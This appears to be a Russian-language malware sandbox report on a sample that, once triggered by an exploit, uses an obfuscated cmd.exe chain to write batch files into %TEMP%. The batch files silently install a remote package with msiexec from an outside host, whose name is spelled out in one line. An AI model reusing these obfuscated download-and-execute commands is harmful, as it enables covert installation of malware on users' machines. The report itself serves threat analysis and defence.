Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ping 1 -n 5&cd %temp%© summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat ^/^^q^^/^i^
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\summary.csv
- %TEMP%\update1.bat
- %TEMP%\update.bat
- %HOMEPATH%\documents\msdn\office spell check control\eula.rtf
- %HOMEPATH%\documents\msdn\office spell check control\spellcheck.zip
Сетевая активность
TCP
Запросы HTTP GET
- http://de###indaix.com/spellcheck.php
UDP
- DNS ASK de###indaix.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ping 1 -n 5&cd %temp%© summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat ^/^^q^^/^i^' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\ping.exe' 1 -n 5
- '<SYSTEM32>\cmd.exe' /C echo
- '<SYSTEM32>\cmd.exe' /S /D /c" set/p="msie" 1>%TEMP%\update.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set/P="^xec%1" 1>>%TEMP%\update.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set/P="HTTP^://^deepmindaix.^com/spellcheck.^ph^p" 1>>%TEMP%\update.bat"
- '<SYSTEM32>\msiexec.exe' /q/iHTTP://de###indaix.com/spellcheck.php
